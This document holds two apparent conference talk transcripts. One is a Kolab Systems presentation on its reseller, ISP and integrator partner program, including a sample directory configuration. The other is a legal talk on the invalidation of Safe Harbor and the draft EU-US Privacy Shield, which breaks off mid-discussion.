10.5446/54586 (DOI)
This talk is about the partner program that Kolab Systems is developing around Kolab in general: what it is, why we're doing it, and where we are with it right now. The subtitle, "accelerating into the market together", probably gives you a good idea of what we're trying to achieve with this. We talked yesterday quite a bit, as Georg mentioned in the introduction, about the missing freedom online. And that's one of these really, sadly ironic things: the internet was once held up as a beacon of change, that people would be able to communicate freely. We would democratize the ability for people to publish information, store information and transmit it, and people would be empowered from the bottom up. Instead, the internet has turned into the best and most advanced surveillance engine the world has ever built, which is tragic. Our mission with Kolab is, at least in the area of collaboration, to address or try to address those problems directly, by giving people an open and free means of collaborating that is secure, that isn't backdoored, and where you can choose where your data is, on your own servers or not. So we're choosing to address that problem head on. As a smallish company, with a product that doesn't quite have the same number of users as, say, Gmail yet, bringing that to the world at large is a really big task. It's a huge task. There's also an immense amount of commercial opportunity out there. So not only is there a good fight to be fought in terms of returning to people the freedom we all deserve and should have, but there's also the more pragmatic fact that there's money to be made. And addressing those two issues on a global scale, or even just in Europe, is something we feel we can only do so fast and so far on our own, without the participation of others. We've got Kolab 3 on its feet, it's deployed in some very large installations, name recognition around the world is reasonable, and we get commercial requests continuously, every single day, from around the world, looking into Kolab. So we've raised awareness, we've proven that it works in the market, and we feel that at this point it's time to be working with others as well towards those two goals of bringing freedom and Kolab into the market. We feel that by having a proper, extensive partner program focused on that, we'll be able to achieve these goals much faster and on a much larger scale. There are numerous reasons for that, and it's not only size. If you go to Kolab Now, the pricing is reasonable, but it's definitely Eurocentric, or North American-centric, in its pricing. If you go to, say, Brazil, you have multiple issues there with the cloud-hosted version of Kolab alone. The economy is different, so in real value terms it's more expensive there. And then getting support in your time zone, in your language, support that is culturally attuned to you as a customer, is difficult for us as a Central European company to provide. So we've started to look at how we can work with others, other companies, other interests, other communities, to bring Kolab into the market. We've gotten to the point where we have a few of our first partners along these lines, and we're working through the rest of the year to roll this out in a large and coordinated way.
So we're going to take a look at the definition of the partner program: who we're looking to work with, what each of these types of partners will be doing or can do with us and what we can do with you, as well as some of the details of what you get out of the deal when you become a partner. In addition to being a partner with Kolab Systems and with Kolab, there is a larger ecosystem around us; for instance, we've been talking a lot about POWER8 at this event, with IBM and their partners as well. So when we bring in partners to work with us on Kolab, we're actually inviting you into a much larger space and a much larger ecosystem that has the likes of IBM and Red Hat behind it. Who here has seen, I know that all of you were at the Taster events, but who here has seen the Kolab Taster events online? For those who are shaking your heads: if you go to taster.kolabsystems.com, you will see these events we've done over the last few weeks in coordination with IBM and Red Hat, focusing on the open stack from the hardware through the operating system up to the application stack. So when we talk about partnering, keep in mind that this is not only with us, but with our broader ecosystem and our set of technology and delivery partners as well. We broke the larger partner concept into three specifically defined markets and profiles of partners, and you'll notice they map quite nicely to how we deliver Kolab in general. At Kolab Systems, we deliver Kolab in three basic packages. One is on-site: it's your server, you say where it is, we put it on there with you, for you, or you can do it yourself. So you have on-site delivery. We have hosted instances, where you can have your own dedicated instance that you don't have to worry about: no management, no backups, it's all handled for you. So, hosting. And we also do the Kolab Now public cloud, where you can put your email accounts into a larger pool on infrastructure that we manage for you as well. That's our software-as-a-service offering. The first class, if you will, or type of partner that we've started to work with are resellers, straight resellers of the software as a service. These are groups that can take the product we already have online, re-bundle it, repackage it and deliver it into their market, to their target audience, allowing for both vertical and regional application. Has everyone here seen what Kolab Now looks like, user-interface-wise? Yes, you've all seen it over there, that's right, we have demonstrations. True enough. So just keep that in mind, because I'm going to show you our first big reseller. We have three resellers now, but this one is, I think, the more exciting one; they're right in the middle of doing their official launch right now. If you were at CeBIT and visited us there, you would have seen them. And that is Secure Swiss Data. This is their white-labeled version of, or entry point to, the Kolab Now cloud. It looks completely different, it has a completely different message to it, and it's their messaging. They're focused primarily on the North American, but also the European, audience. They've got a bit more of an edgy approach to it, which is really nice. Also beautiful pictures of mountains, because it's Swiss. But this really shows the possibility: if you looked at it, you would go, well, okay, this looks like Secure Swiss Data.
All they're doing is reselling the software and the services that we provide. They don't manage any servers, they don't manage the billing backends, et cetera; we work with them to do that, and they turn around and resell. They've actually defined their own packages, so that if you go to Kolab Now and sign up, while the feature set is the same, what comes included and what the default packages are called vary. So we really are able to white-label or customize for our resellers, from the service level all the way through to the presentation. Within that, we obviously have a revenue-sharing model. The reseller is free to set the pricing that they want, and then we share revenue from there on a case-by-case basis. They're actually reselling both the Kolab Now public cloud and hosted instances, so the full software-as-a-service suite. The second class of partner that we defined is ASPs and ISPs. We lump them together because, from our perspective, how we deliver to them is the same, even though they have different business models and cater to different audiences. So, the application service provider and the internet service provider market. Essentially what we do for them is help set up their own Kolab Now, but on their servers, under their management, et cetera. We provide technical training, we provide sales training to them as well, and we consult on how it should be set up and how to manage it in the long term, to make sure that they deliver a quality service to their customers and their clients. Again, they're free to set their pricing. We also have a revenue model for them where the more seats they have, the more the price scales down, to a very affordable per-seat price. The pricing for them is based purely on active seats in their installation. There is no base-level entry fee to pay up front, which is refreshing to many of them, because they're used to the Microsoft model where you pay a whole bunch of licensing fees just to get going and then you start paying per seat. But free software to the rescue: it's purely per seat. So they get the ability, from us as the experts around Kolab, to instantly deliver a high-quality service that they own. And this has become more and more interesting to this segment of the market in particular since Microsoft has moved to Office 365. They're pushing people towards Office 365 and their solutions: you can edit your office files there, you can have your Skype-based VoIP system. And so what's happening for a lot of these companies is that Microsoft is coming in and scooping their customer base out from under them, to the point where, especially for ISPs, they just become a pipe and nothing more. There's nothing to differentiate them from their competitors; they've lost a very important way of building a relationship and retaining customer loyalty. Kolab fits into that very nicely: we have a proven, scalable solution that you can manage quite effectively and affordably, and it gets you away from these larger companies like Microsoft and Google that are, for all intents and purposes, trying to take your customers away from you. So, as with the example of Secure Swiss Data, we have an ASP partner in Switzerland, Avectris. Many years ago they were the IT departments of four different energy companies in Switzerland, and the energy companies looked at it and went, well, we're not IT companies, this is silly.
So they figured: if we just put them all together, kick them out the door and make them a for-profit company of their own, they can deliver the same services and we might even make some money. They're now in the main engineering building, with 400-some-odd technical people, plus management and sales on top of that. They primarily service the energy sector in Europe, energy sector companies in Europe, and they have customers in Asia as well. Interestingly enough, Avectris is one of the five Microsoft Platinum partners in Switzerland; they're one of the top five Microsoft licensees in the country. They had one person on staff who officially had Linux expertise. So when they asked us to come in, we demoed our solution next to others, showed how the partnership model works and how, due to the nature of free software and open source, they get benefits they wouldn't get elsewhere. And they went, okay, great. The only problem is: we have no Linux infrastructure, we have no Linux expertise, we want what you have, can you help us? Let me go through exactly what we've done. Originally they were planning on deploying it on Hyper-V, the Microsoft virtualization platform; that's what they deliver everything else on. We got it set up for them on that platform. They said, well, can we hook it into Active Directory? We said, yes, of course, here's how it looks, and we worked with them to do that. But then, after this was all done, they took a step back and crunched the numbers, and they said: the funny thing is, the Hyper-V platform is now going to be the most expensive part of the solution. With our other proprietary solutions, not just Microsoft, the licensing of the proprietary software just hides the virtualization layer; it's not an important line item. But suddenly with Kolab, both because we can run it on less hardware, fewer resources, and fewer people to keep it up as a result, and because of the very good per-seat model, the virtualization platform they were paying for was suddenly visible in the budget. And they said, can we get rid of that? And we said, yes, you could. You could move to an entirely Red Hat Enterprise Linux solution, which is what we do ourselves, and put the virtualization on there. So they actually built out an entirely new hardware solution specifically to run Linux, and they've hired a few new engineers who actually have Linux expertise. So this has been a really interesting journey with them. We walked in and said, yes, we can make it work in your environment on the platform of your choice, and we showed them we could do it. But at the end, they turned around and said, no, we're going to do it your way anyway: we understand now why you've picked Linux as your base and built on that. This is a really nice example. One of their first customers that they've rolled this out to: they're using it internally, but they're also using it with their customers, offering it as an alternative to Microsoft Exchange. And the first customer didn't want to migrate everybody off their Microsoft Exchange, a few hundred accounts, because that's disruptive. So they're actually running it in parallel: all the new accounts, and all the people who were moving off an older system, are in Kolab, while the 100-some-odd seats still in the old Exchange don't have to deal with transferring data. And the people just use it together.
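As a side illustration of the Active Directory hookup described above, here is a minimal sketch of what the relevant directory settings of a Kolab 3 server configuration (typically /etc/kolab/kolab.conf) might look like when pointed at an existing directory. All host names, DNs and passwords below are placeholders, and option names can vary between Kolab releases, so treat this as an assumption-laden sketch rather than a verified setup.

# Hypothetical excerpt from /etc/kolab/kolab.conf (illustrative only).
# Authenticate Kolab users against an existing LDAP/Active Directory tree
# instead of the bundled 389 Directory Server. All values are placeholders.
[kolab]
auth_mechanism = ldap

[ldap]
# Placeholder domain controller reachable over LDAPS
ldap_uri = ldaps://dc1.example.local:636
base_dn = dc=example,dc=local
user_base_dn = ou=People,dc=example,dc=local
group_base_dn = ou=Groups,dc=example,dc=local
# Dedicated service account used by Kolab to bind to the directory
service_bind_dn = cn=kolab-service,ou=Services,dc=example,dc=local
service_bind_pw = change-me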
We went in and trained their support staff to handle first-level and second-level requests, and we have another set of training coming up next week with them, to help their engineers understand how to do more complex maintenance. So we're there with them all the way along, including, for that one customer they've already rolled out to, providing a white-label presentation branded with their customer's branding. So they have a version branded for Avectris, with their logo and their colors; it looks like Avectris, but it's powered by Kolab. And when they deliver it to their customers, we again help them white-label it for each customer, so each customer gets this beautiful, tailor-made solution. And they're able to deliver that at a lower price, without the fear of Microsoft coming in and stealing the customers off to Office 365. The third class of partners that we're working with are integrators. These are your typical IT companies, often very regional, ranging in size from a few people working out of a small office to international firms with thousands of IT specialists, who go into companies that need IT, which is everybody, and sort out their IT, from printers and laptops to server-side software and everything in between. We're working with integrators to help them add Kolab to their suite of offerings, so they can walk in and go: yes, we can set up your Windows machines, we can put your printers in, we can do your networking, we can provide your VoIP, and now they can also provide a proven open-source collaboration platform. And again, just as with the first two categories of partners, we have a standardized revenue model that keeps everybody very much incentivized to sell, to support, and to keep our combined customers happy. So with these three different types of partners, we're able, currently and in the future, to really broaden our impact and reach new audiences. With resellers, we get to hit the consumer market a lot harder and with a lot better coverage. With the ASP and ISP partners, we're able to get into the hosting environments a lot more than we could ever do on our own. And with integrators, we're able to mobilize, with our partners on the ground if you will, an army of IT specialists who can bring Kolab into your local towns, cities, governments, companies, et cetera. And just as with the previous two, we have a support system for them as well. To talk a bit about how we support integrators specifically and what we offer them, I'm going to invite Peter Lemken to come up, who is with Kolab Systems Austria. We just recently officially opened an office in Austria due to demand and interest there; Peter is heading that up and is a partner manager for us as well. So he's got a fair amount of information to share about how we plan to help our integrators. Okay. Yeah. Still good morning, it's one minute before noon. Thank you for the introduction. Integrators in a general sense: Aaron has already given the overview of that. What I'd like to focus on is the local and regional aspect of it. Just to give you a short background on me: I've been working for another open source company for the past four years, and in that capacity I have worked with local integrators all over the world. I managed to open up new regions: I worked in Israel.
I worked the region of South Africa, I worked in the UK and Ireland. And the idea for Kolab to move over to Austria actually came from a customer request, from a large institutional customer from the government, who specifically said: yes, we would like to work with Kolab, but we also need a local integrator that you work closely with and have a good collaboration with, so that we can feel secure in having local support and local people to talk to, and feel secure in having our infrastructure set up by a local company. So enabling a local customer is actually what all this is about. What I'd like to talk about is the question: can we, as Kolab, headquartered in Switzerland, scale up and manage all the regions on the planet that are interested in Kolab? The answer is no, we can't. Not without local integrators, not without local partners who support us, who are interested in pushing our message forward, pushing the product, and enabling us to get new customers. I'd like to get a little more specific about how we did this in Austria, how it worked out there, how we believe it scales to other countries as well, and how we can win a lot more new customers with local partners. That's the idea behind it. Can I move on from there? All right, the partner benefits. I'd like to give you an overview of what we have designed as part of our partner program, with some examples of how we did this in Austria, how we'll continue to do it in Austria, and how we'll move it on to other countries at a later stage. Selling the product is actually the most important thing, because without new customers, no local partner will be interested in working with us. So what we do, and will continue to do, is enable them in terms of sales support and training. How do you sell an open source product? Well, you can't, because there is no licensing fee; we all know that. So what you have to do is make a customer understand that there is added value in using an open source solution, and in using the support and the technical knowledge of the company behind the product itself. So it's talking to the customer, talking to our partner and making them understand what we stand for, what our values are, what our technology is able to do and what benefits that really gives to their own customers. There are a lot of regional aspects to that, and let me give you a small idea about doing business in Austria. As most of you know, I'm not Austrian. I live in Austria, but I'm German, and even if I had lived as a German in Austria for the past 20 years, which I have not, I would not be privy to all the intricacies of Austrian politics, Austrian policies, Austrian personal involvements and all the connections that are going on. For that, you need a local partner. Now, Austria may be very close to Germany and Switzerland, but if we are talking about other regions like Israel or India or Australia or wherever, you will always find regional specifics that nobody other than a local partner can actually handle. And handling means actually selling our services and products. We really, really depend on the local partner and integrator.
What we are doing is giving them the training to make them understand what our value proposition is in terms of open source software and our services, and then having them translate that to their regional market and make their customers understand why Kolab is a good choice, how we are positioned against our competitors, and how they can move forward and actually win and make money with us. That's what it boils down to: every local integrator wants to make money and needs to see our support in translating that into their local business. So that's the part about sales support and training. Now, we have had the Kolab Taster, as you know, in Zurich, we will have one in Bern next week, and we have just had one in Vienna, and Vienna was really a prime example of entering a new market. We gave our local partner the opportunity of talking to his customers through our marketing assets. We do this in collaboration with IBM and Red Hat, so the event was actually covered. The task was to go out and make contact with local customers in Austria, make them understand: hey, there is a new kid in town, just visit us, get an idea of what we are doing in a technical sense, and get an idea of how we collaborate with our local partners and our technology partners like IBM and Red Hat. So partners get professional marketing assistance. We have a continuous effort going on to standardize our marketing, and we have a great guy on board who does that very, very well. So we are able to provide a package of marketing support that many other open source companies do not have at that comprehensive level. All right. Now, technical support and training is probably one of the most important aspects of this. If you have a local partner who is not just a reseller but actually an integrator, they need to be technically savvy, they need to know what they are doing, for the simple reason that we as a company cannot scale up to serving all the end customers ourselves. So the requirement for us is to sign up partners who are able to do level one and level two support, with us always in the background, available on a very high service level, to solve the real technical problems that a regular engineer cannot handle. We are talking about source-code-level support; this is what we can provide to them. So we are providing that kind of technical expertise to our local partners, and we are able to do it at a very high level. We have certifications coming up; that is still playing out in the future, it's what I am working on with Aaron. But even now, we already provide the kind of technical support that lets a local partner feel confident in implementing and supporting their customers. All right. This again goes back to marketing: exclusive monthly updates by newsletter give a local partner an idea of where we are moving. Or are we moving at all? Yes, we are. We are winning new customers, we are giving updates about our technology, an overview of where we are going, what our roadmap is, and so on. We don't want to overdo this, so the monthly newsletter is going to be comprehensive but short, with interesting information that enables a partner to talk to their customers and say: hey, something new has come up with Kolab, they are doing some really interesting stuff, Roundcube 2 is coming up.
The Kolab mail client is coming up. There is going to be stuff that you will be really excited about in the upcoming months. All right. One more thing: as an open source company, we are heavily dependent on, no, we are actually addicted to, we can't do without, the community. Right? The community does development and support and actually moves development forward in terms of the roadmap and so on. We want to do that at our partner level as well. What we are trying to do is get to a point where our partners do not only interact with us directly, but interact within their community as partners as well: talking about their regional aspects, talking about customers that they have, and exchanging experiences among themselves. So we want to take ourselves back and just provide a platform for our partners to interact, which gives them the opportunity to find out: what can I do as an integrator? What have you done? Do you have an example of how you did it with your customer? This is our plan. It's not implemented yet, but it's on the roadmap; it is something that we are going to do. A lot of this, by the way, is still work in progress, but it's cool to be working on it, trying to get feedback from our existing local customers and local partners and trying to scale that to new partners, winning them over and making them understand that working with Kolab is actually a cool idea. Just as Red Hat tries to make a lot of their technical expertise available on a non-personal level, we are trying to build up a knowledge base. That knowledge base is designed to be available to partners only, because it contains very practical things that our partners have already started implementing: they are working with their local customers, they encountered problems and challenges, and they came up with cool new ideas. What we want to do is make that available to all of our partners as an online knowledge base. The co-marketing point goes back to everything related to marketing. We luckily have somebody who is really heavily involved in marketing, creating an identity for Kolab that will enable partners to be part of an ecosystem among themselves. Creating co-marketing opportunities in one place will give us the opportunity to do that in 10 places and 50 places all around the world; that is what we are targeting. The technology ecosystem: you have heard about all the things that we can do on the server side, like the POWER8 systems that we now have vast experience with, which is cool new technology. We are working on new technologies like Roundcube 2 and Kube as a mail client. We want to inform partners about these as early as possible, because that makes them interested in telling their customers: hey, something new is coming up. We are reaching out to potential new customers, and we are reaching out to potential new partners by having them in our ecosystem as well. The last thing is actually one of the most important: to have as many online capabilities as we can. You may remember, about 10 years ago, service-oriented architecture was a big thing; everybody talked about it, very few people actually implemented it. Our idea is to give our partners and our big customers the opportunity to self-serve as much as possible. This too is still a work in progress.
We have very cool ideas coming from Aaron and from the rest of the company to make it as easy as possible for a partner to interact with Kolab as a business partner, because in the end it all boils down to money. You want to spend as little time as possible interacting with your software provider; you want to do as much for yourself as you can. And we want to enable that by putting online purchasing, subscription management, reminders of when your subscription is running out, all of that, online as much as possible. Having exclusive access to our partner ecosystem as part of our website is one of the steps that we are going to implement at the end of the year. So there is a lot going on. As you can see, I'm still struggling to give you very many specifics; a lot of it is work in progress, but we are pretty much on the same page about where we want to go. Where do we want to go? We want a worldwide partner ecosystem that spreads the message of Kolab being the really cool thing in open source, replacing existing technologies with a different business model. And in the end, which is the most important thing, if you work with Kolab as a partner, you have a really big opportunity to make a lot of money, because we are individual: you can talk to us, we can design our business model around your requirements as a local partner and your customers, really servicing big infrastructures, as we are doing in Austria now. That's where we are going. There is still a lot of work to be done, but it's exciting to be part of it, working on it and trying to find out how we can best work with our partners to make them happy and make a lot of money; that is what it is all about. It's cool to be part of that. Thank you very much. Thank you.
Aaron stayed on to explain the different types of partners we work with, and how resellers, ISPs and integrators were using Kolab to offer more and better services to their clients, while cutting costs and boosting business at the same time. Peter Lemken, Account and Partner manager at Kolab Systems Austria, then went into much more detail as to how Kolab Systems helps and supports partnerships with integrators (starts at 20:00).
10.5446/54587 (DOI)
I actually initially drafted the slides in German, and the thinking that went into them was in German. So I translated them, and they will probably in parts not appear entirely professional the way they are now, but I hope we get through it properly. It shouldn't matter too much, because it's strange legal language anyway from the beginning. Thank you for the introduction. It's actually a very good point, and I can start with that: if the UK, or parts of it, who knows, actually ends up leaving the European Union, it might still end up being part of the European Economic Area, so it might end up with a status something like Norway or Switzerland has. In terms of data protection, the European Economic Area at this point is more or less the same, shall we say, as the European Union. But it might end up, and people are pushing for that, having a special status, the best-of-both-worlds stuff, and that may end with the UK not being part of the European Economic Area, and therefore it might well need a UK privacy shield. Because that is what this is about: transferring personal data, in the legal meaning of the term, to countries that are not part of the European Economic Area. And to start the whole thing: it doesn't make a whole lot of sense to me to look at what the Privacy Shield is, or what it might be once it's done, without starting with what caused the whole problem. Why do people have to work so hard to come up with something so complicated? There's a history, a certain formal legal setting, that requires that, and I will then only briefly spend some time on what other ways there are to transfer data there, and we'll then end up at the Privacy Shield, trying to have a look at what, not in detail, but in principle, is written there, how it is supposed to work, and where we stand in the process. The core of the problem is that from an EU law perspective, the EU is good, or the EEA is good, and everything that happens within those territories is good and uniform and assessed as okay, and therefore there are no problems with cross-border data transfers within that area. But consequently, everything that is outside that area, we don't know how bad it is, but us not knowing means that we have to treat it as bad, as forbidden territory, if you will. So you can't transfer data there unless certain conditions are met, and among those conditions there are some statutory ones, which I'll get to, that sound good but hardly ever apply, and then there is the more muddled stuff that you may have come into contact with: the so-called model clauses, and, with a view to the United States, formerly the Safe Harbor principles, the Safe Harbor framework. The idea was essentially that the EU was looking for a way to counter the problem that it created itself by saying everything outside the EU is bad. So it gave the Commission the power to make Decisions with a capital D, a formal way to get there, which basically have binding power on the member states. And that Decision can be that in a particular third country, the level of data protection afforded by the laws, the system, the whatever, is actually sufficiently adequate in comparison with what we have in the EU to say that data may lawfully be transferred there.
The EU has, and I'm actually speaking rather freely, I suppose, not really sticking to my slides, the EU has made a number of Decisions to that effect, where it has said that certain entire countries are actually okay in terms of receiving personal data from the EU. For example Argentina, Switzerland, Israel, and Uruguay as well, and, well, I think one or two more, which kind of brought those countries in to take part in what we like so much, which is our data protection realm in the EU. And that did not work with the United States. I mean, they could have tried to go the same way, but they did not, because, I'm assuming, I think nothing has ever been published to that effect, but I'm assuming that the Commission couldn't quite arrive at the conclusion that the general statutory data protection level there is actually comparable to the EU. So what they did was create a framework, and it's called the Safe Harbor framework, that's just a catchphrase. They created that, and what it was is a Decision that basically said: well, the country itself is not adequately protective, but if companies that process data in that country, or have their seat in that country, adhere to certain principles and self-certify accordingly and register for a list, then those, you know, not the country, but those companies, are actually safe places to receive personal data from the EU. And it was always a bit flimsy, and for years, especially in the last five or six years, there has been a lot of criticism saying that the framework doesn't work, and no one's ever looking into it, and it's just a smoke screen, and so on and so on. And that criticism, obviously, without anything else, doesn't change anything, so we essentially needed a court case, someone to look into it. And Mr. Schrems, a guy from Austria, you've probably heard of him, took it upon himself, not only in this setting but very generally, to take it to Facebook, basically, and go down all kinds of roads to, well, whether you like it or not, proclaim that Facebook is essentially abusing its users' data and so on. And one of the roads he took is that he complained in Ireland to the local data protection authority, because Facebook Europe has its seat there, and he basically said: you have to do something, because you're the competent authority to do something about it, and you can't just look on at all those wrongdoings that happen in your country. It's your job. And then the authority did look at it and came to the conclusion that everything is okay, and where maybe things were not okay, they couldn't look into it, because the data transfers from Europe to the United States were, shall we say, protected by the Safe Harbor decision made by the Commission in 2000. So they said, well, whatever we may think, there is the Safe Harbor decision and we have to stick to that; we can't make our own decisions in some respects, so there you have it. But the issue was recognized, and it then went to the court in Ireland, and the court in Ireland said, well, we have to bring that up to the European Court of Justice. The Court of Justice, the European Court, the ECJ, that's what it is.
And the court came to the conclusion that, indeed, the Decision that is the Safe Harbor framework, the Commission Decision, is in fact invalid, and it thereby simply no longer exists. It's history. And what that meant was that one of the most used foundations for transferring data to the United States was gone from one day to the next, basically. So ever since then, people have been trying to work on replacing the Safe Harbor framework, and that ends up being the Privacy Shield; we'll get to that. And as you can see in the timeline, when it comes to business, people start to work rather swiftly; normally everything in terms of EU legislation takes years and years and years. And as you can see, people had started to work on this in 2013, essentially. But when you look at the timeline, it is not even half a year after the judgment was passed that the United States and the Commission agreed on a draft for a replacement of the Safe Harbor decision, which will now probably be the EU Privacy Shield decision. So it's the same setup, essentially; it's just called differently and has different rules. And people have had a chance to voice their opinions, which mostly have been rather critical of what the draft says, the latest of that in April. Currently, negotiations are ongoing. So we're still working with the draft that we got in February this year, but it is known that negotiations have been continuing and people have been working on the wording of the draft decision. It is currently with the Article 31 committee, that's where it's placed, which features the representatives of the member states, and the Article 31 committee essentially needs to consent to the decision, otherwise it can't be made. That's where we stand. But the plan is actually to have something in place, a final draft with everyone's consent, in August of this year. So it's two months to go. And now, when we look at the future that the Privacy Shield may or may not have, we need to think about: what made the European Court of Justice actually say that the Safe Harbor decision is invalid? Essentially, EU law prescribes that if the Commission wants to decide that a country or a certain framework is actually adequately protective of personal data, it needs to assess the state of the law in that particular country in depth, comprehensively. And the ECJ did not say that the state of the data protection laws in the United States is bad. What they said is: Commission, you didn't look at it. You just came up with something without actually taking a look at what you were deciding about. You have to assess the laws, and you didn't do that. So for that procedural problem alone, they said, the decision is invalid. And secondly, what they said is that the member states have independent data protection authorities, and they have to be independent, that is at the core of the whole thing. No Commission decision can restrict their decision-making power and their power to investigate a case just because the Commission thinks that the state of the data protection laws in another country is actually adequate. That takes away from the independence of the data protection authorities. So that was the second problem. And the result is that, since the Safe Harbor decision is gone, the United States is as bad a country in data protection terms as any other country in the world, regardless of how it actually is.
And all data transfers that have relied on Safe Harbor are essentially unlawful now. There has been, I'll get to that, a bit of a grace period, but that grace period ended at the end of February. So at this point, you can't just transfer data to the United States; it doesn't matter how well regarded your recipient company is, you need to do something additional to be allowed to transfer. And that is, and I have to briefly mention this because they've been in the press as well, the only instrument that you can actually control as a company, come up with yourself, use yourself: the so-called EU model clauses. You will probably have heard of those. It's a bit like the German Auftragsdatenverarbeitung agreements, but it works differently; it's kind of the, shall we say, equivalent of that when it comes to data transfers from, for example, Germany or France or wherever, to the United States. But here the differences begin: the model clauses don't relate specifically to the United States, they apply to any third country outside of the European Economic Area. So that makes them different. And it's a set of contractual clauses. It looks like an agreement: it starts off, it has a lot of clauses, and it ends with signatures and certain appendices. One can like them or not; they're a different kind of instrument. Now, what we've read a lot over the past months, even in qualified papers, shall we say, is that the fact that the Safe Harbor framework is dead also means that the EU model clause idea is dead. That is not the case. It can't be, because it works completely differently. The only thing we can think about is whether one or some of the accusations that the ECJ directed at the Commission apply by analogy to the EU model clauses as well. And that could be, of course, the non-assessment of the state of data protection law. But that is obviously not the case here, because the very idea of the model clauses is that in the recipient country there is no adequate data protection level; otherwise you wouldn't need them. So there is no requirement for the Commission to assess a certain state of the law. All they have to do is come up with a set of clauses that in themselves allow for a sufficient amount of trust that the recipient company will treat the personal data as prescribed. So there is no direct spillover. And I don't know if you've heard about that discussion, but a lot of people say: well, you can't transfer data to the United States, there is at this point no tool that you can use to make that happen. That's not true, and the authorities have admitted as much. I mean, the member state authorities never really liked the model clauses, but they can't help it, because it's a Commission decision that, at this point, has statutory power; it's binding. No member state authority can say, I don't recognize the model clause framework. So those remain, for now. But people have been trying, and there is at least one case underway that seems set to bring the model clause questions, whichever they may be, up to the European Court of Justice as well. Because it's the same impetus that people have: saying, if Safe Harbor doesn't work, the model clauses don't work either. And the only institution that can say that is the court.
So let's bring it up to the court. What I can tell you is that for now they exist, but they may not forever. I'll skip the alternative instruments, by the way, because they're not really interesting. Of course, if an individual really freely and expressly consents to data being transferred to the United States, that overrules everything. But the question, as always, is whether it is really a free and informed decision. And the authorities, for the most part, rightly or wrongly, tend to assume that if it's a big company on the one hand and an individual on the other hand, it's never a free and informed decision. Plus, for the most part, they don't consider the privacy policies that are published on websites sufficient information. Because, at least for the most part, and I'm certainly not a Google or Facebook hater, but if you look at the privacy policies that they publish, you don't really learn a whole lot when you read them. And I write those things. So, yeah, it's rather opaque, as Boris Johnson would say. Yes, well, he is opaque, we all know that; just today we've learned that, sadly, I might add. And what the data protection authorities have done is grant a grace period up until the end of February of this year. That's gone. So if companies, and thousands and thousands still do, rely on Safe Harbor, they're actually committing an unlawful act. And in Hamburg, the local DPA has tried to set an example by actually handing down administrative fines. They're not particularly high, of course; it's more like a symbol. But they did that to make it clear to companies that when they say end of February, they actually mean end of February. So they started proceedings immediately afterwards, just to make the point. Safe Harbor has really died. Now, on to replacing, or trying to replace, Safe Harbor with something better, something that the Court of Justice may possibly actually allow. Because, of course, the Privacy Shield, once it's done, will be brought up to the Court of Justice as soon as possible by someone; that's for sure. It won't last unchecked as long as Safe Harbor did. Safe Harbor was in place for 15 years, and the new framework will be tested, I'm assuming, within the first one or two years of its existence. Now, what are people trying to do? When we talk about replacing Safe Harbor, in a formal sense and in how it is structured, it's actually rather similar. So again, it will be a Commission Decision with a capital D, binding upon the member states, that says that if companies comply with a certain set of principles, and if they set themselves up in certain formal ways and register for a list and do this, that, and the other, self-certifying themselves, they are suitable recipients for personal data from the EU. So it's the same basic idea as Safe Harbor was. They're just trying to do a better job; whether they've done it is a different question. What we know at this point, and I can only say we have to be a bit cautious, is an outdated draft from the end of February of this year. And people are working rapidly on the whole thing, so even though it hasn't been published, we can assume that there is a more current state of the draft that will at least in part look different. So I don't know what's going to be in the Privacy Shield decision at this point, but probably the general setup will be the same, and the way it's supposed to work.
So, a lot of stuff, a lot of text: 35, 40 pages where the Commission explains how it came to its decision, the background of it, the principles behind it and all that. And the actual core of the thing will be placed in annexes. There will be an Annex II that essentially contains the rules that people need to follow. And then there's a bunch of other annexes, six altogether, where certain U.S. authorities, in letter form, explain how U.S. law works, how it will work in the context of the new Privacy Shield principles, what they do to control it, and what recourse people have in the United States, and there are different points of contact and all that. So it's not going to be a treaty where you have the TV cameras rolling and people get out their fountain pens and you have flags in the background and people sign. It's going to be a piece of paper, essentially, or online, I don't know, a PDF published by the Commission that contains other pieces of paper where the U.S. says: this is what we'll do to safeguard the entire framework. It's close to a treaty, but it won't be one. That is one of the criticisms, essentially, because people say these are empty promises. What will happen then is that if a U.S. company, self-certifying itself, registers for that list, it will be bound to the principles that Annex II contains. There will be certain checks and safeguards, I'll get to those. But as a self-certification process, in that sense, it's the same thing as Safe Harbor, which of course leads to the corresponding criticism. And from a European perspective, what will also remain the same is that no matter how well or badly the system works in the United States, it will always be the company in Europe that remains responsible for what happens with the data. They remain responsible for the decision to transfer the data to the United States. If things go badly, they have to stop it. So they can't say, well, we did everything right; what will matter is that the result remains right, and if it's not, it has to stop. But that's nothing new either; that's the same as we had prior to 2015. So in terms of what the U.S. companies have to comply with, not that much changes. There is more wording and the principles are more detailed, but the general way to handle this is the same. What does change, at least on paper, is the commitment of the United States government to actually look out for the system, to control it. And to get there, shall we say, the Commission has required, from their perspective, a lot of information on how things work in the United States, in particular, of course, with a view to the intelligence community, shall we say. And they have received information; now, of course, we can debate for months and months whether that information is telling, in sufficient detail, but they have received ten, twenty pages from various authorities explaining certain things. And, you know, going back to the accusation that the Commission did not assess the state of the data protection laws in the United States when it did Safe Harbor: that's essentially the way the Commission wants to make sure that this time it has assessed the situation with sufficient comprehensiveness. So that's what they do, or try to do, to protect themselves against experiencing the same result before the court a second time.
And that was one of the elements that was missing in Safe Harbor; Safe Harbor was really nothing. Now, what they were trying to do when setting up the principles, and I use the word try on purpose, was to mirror, reflect essentially, the current Data Protection Directive that forms the basis of all the national data protection laws in Europe at this point. We'll get something else in two years, but for now that's the way it is. So they've tried to come up with a set of principles, a set of: what do I have to do, what can I not do, as a company; there's simply a list. And I don't think it will be particularly fruitful to have an in-detail look at this point. What the principles want to achieve, and they don't, but what they want to achieve is essentially transferring our principles, our regulation of data protection, to the United States, which will never work. But it's an attempt. And when you compare it to what we have in Europe, it takes five seconds to notice that it is not congruent. It is not the same thing. There are a lot of gaps, a lot of contradictions, at this point. The way it's drafted at the moment, and I'm sticking my head out here, I predict that it will never pass an ECJ test. But then again, I'm not the only smart guy in the room, so people have seen that, and I know that people are working on the text as we speak, and have been for the past three months. So this is not the final state of things; there will be more work done on it. Because, of course, for the data protection people in Europe it only took a couple of days, essentially, to realize that there are a lot of things to be criticized. Some of them are of a principled, almost political, nature, and other criticisms are really only for lawyers, shall we say, but they're no less important when it comes to actually working with the thing in real life. What they're saying is that the whole thing is just super complicated. You have to skip back and forth to find stuff. From a scientific perspective, that may not be so bad; it's just a bit more work, but you'll find it. But in practice, that's a bad thing for a statute, and essentially it is a statute. You have to be able to apply it to a real-life situation without taking two hours to find the different bits that you need to qualify a situation. So it's simply badly drafted. 